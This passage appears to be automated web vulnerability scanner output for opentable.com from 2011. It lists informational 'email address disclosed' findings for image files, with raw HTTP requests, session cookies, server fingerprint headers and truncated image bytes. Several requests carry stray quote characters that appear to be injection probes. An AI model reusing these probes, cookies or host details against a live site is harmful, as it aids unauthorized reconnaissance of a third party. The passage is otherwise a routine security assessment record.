Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 134
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:56:41 GMT

GIF89a..........baJ......XX@y.e......!.......,..........K.UZ...)k......`.~bI.cj........<X7......YA.x.q.....-......2!.....^._.........;
20.106. http://www.opentable.com/img/dnbase/home_image.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/dnbase/home_image.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/dnbase/home_image.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; s_cc=true; s_nr=1317651710801-Repeat; s_sq=%5B%5BB%5D%5D; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 53494
Content-Type: image/jpeg
Last-Modified: Fri, 23 Sep 2011 02:09:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 14:21:29 GMT

......JFIF.....H.H....'.Exif..MM.*.............................n...........v.(...........1.........~.2.......................i...............
....'..
....'.Adobe Photoshop CS3 Windows.2010:12:09 10:22
...[SNIP]...
20.107. http://www.opentable.com/img/icons/FaceBook_24x24.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/icons/FaceBook_24x24.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/icons/FaceBook_24x24.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1147
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:06 GMT

.PNG
.
...IHDR..............w=....BIDATH....o.U..?..;...kK. ..DZ....B.M.@..c..........n..r.......FC.....1.............{.....e!z.sof..~..{..+.........k/.#..#.>.........[.x....!..;..CO.y.7.>3.c...Y
...[SNIP]...
20.108. http://www.opentable.com/img/icons/Twitter_24x24.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/icons/Twitter_24x24.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/icons/Twitter_24x24.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1266
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:06 GMT

.PNG
.
...IHDR..............w=.....IDATH......E....U..M{z..`y=.!.o..-..V..^wA......+..'..8 .......BB..`...]c...e..k..0...]....!..3....U.U]..._D..<x.;...x...n..R4.Ah......N.....,1...']8.7{..Ob..w.5
...[SNIP]...
20.109. http://www.opentable.com/img/info/DiningRewards.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/info/DiningRewards.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/info/DiningRewards.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3532
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:09 GMT

GIF89aH.H.......................44...................)).............[[..........SS............................rr.......................................................aa................<<.............
...[SNIP]...
20.110. http://www.opentable.com/img/info/Zagat_Affiliate_Page2.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/info/Zagat_Affiliate_Page2.PNG

Issue detail

The following email address was disclosed in the response:

Request

GET /img/info/Zagat_Affiliate_Page2.PNG HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5908
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:08 GMT

.PNG
.
...IHDR.......w......B.z....gAMA......a.....IDATx^.....E...?.....[...q.kuA.......1......F.....D.`$.E... (D ..&""..A$$b.[..NuwuuO..;....=.vWW?.........?P.
@.(.C.^{..s..?...P.
@..)....w4dp.
@.
...[SNIP]...
20.111. http://www.opentable.com/img/inputfield-down-arrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/inputfield-down-arrow.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/inputfield-down-arrow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 59
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:50 GMT

GIF89a............!.......,....................j.}9..>..;
20.112. http://www.opentable.com/img/logos/opentable_logo_reg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/logos/opentable_logo_reg.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/logos/opentable_logo_reg.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="; s_cc=true; s_nr=1317646624233-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5305
Content-Type: image/png
Last-Modified: Tue, 22 Sep 2009 22:11:00 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:56:42 GMT

.PNG
.
...IHDR.......".......wi...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.113. http://www.opentable.com/img/logos/sh_en_safeharborlogo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/logos/sh_en_safeharborlogo.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/logos/sh_en_safeharborlogo.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 20919
Content-Type: image/jpeg
Last-Modified: Tue, 21 Apr 2009 18:56:14 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:42 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................R....
...[SNIP]...
20.114. http://www.opentable.com/img/privatediningimages/200-200_Golden%20Gate%20Room.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/privatediningimages/200-200_Golden%20Gate%20Room.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/privatediningimages/200-200_Golden%20Gate%20Room.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 32889
Content-Type: image/jpeg
Last-Modified: Tue, 15 Dec 2009 22:09:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

......JFIF.....`.`.....C....................................................................C............................................................................"..............................
...[SNIP]...
20.115. http://www.opentable.com/img/privatediningimages/200-634353727080820434-0_Orpheum_Banquet_340x226_72dpi.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/privatediningimages/200-634353727080820434-0_Orpheum_Banquet_340x226_72dpi.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/privatediningimages/200-634353727080820434-0_Orpheum_Banquet_340x226_72dpi.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 9250
Content-Type: image/jpeg
Last-Modified: Fri, 11 Mar 2011 00:58:13 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."..............................
...[SNIP]...
20.116. http://www.opentable.com/img/privatediningimages/200-634499711498151079-5976432047_d8d9a5ed37_o.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/privatediningimages/200-634499711498151079-5976432047_d8d9a5ed37_o.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/privatediningimages/200-634499711498151079-5976432047_d8d9a5ed37_o.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 8622
Content-Type: image/jpeg
Last-Modified: Thu, 29 Sep 2011 13:22:03 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."..............................
...[SNIP]...
20.117. http://www.opentable.com/img/restProfile/OffersBGCenterSolidGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/OffersBGCenterSolidGray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/OffersBGCenterSolidGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3601
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

.PNG
.
...IHDR.............u..7...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.118. http://www.opentable.com/img/restProfile/OffersBGSolidGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/OffersBGSolidGray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/OffersBGSolidGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3907
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:55 GMT

.PNG
.
...IHDR... ...L......p#....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.119. http://www.opentable.com/img/restProfile/ToolBar8bitGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/ToolBar8bitGray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/ToolBar8bitGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3754
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR.......C.....YLB....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
20.120. http://www.opentable.com/img/restProfile/ToolBarBGCenterGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/ToolBarBGCenterGray.png

Issue detail

The following email address was disclosed in the response:

Request

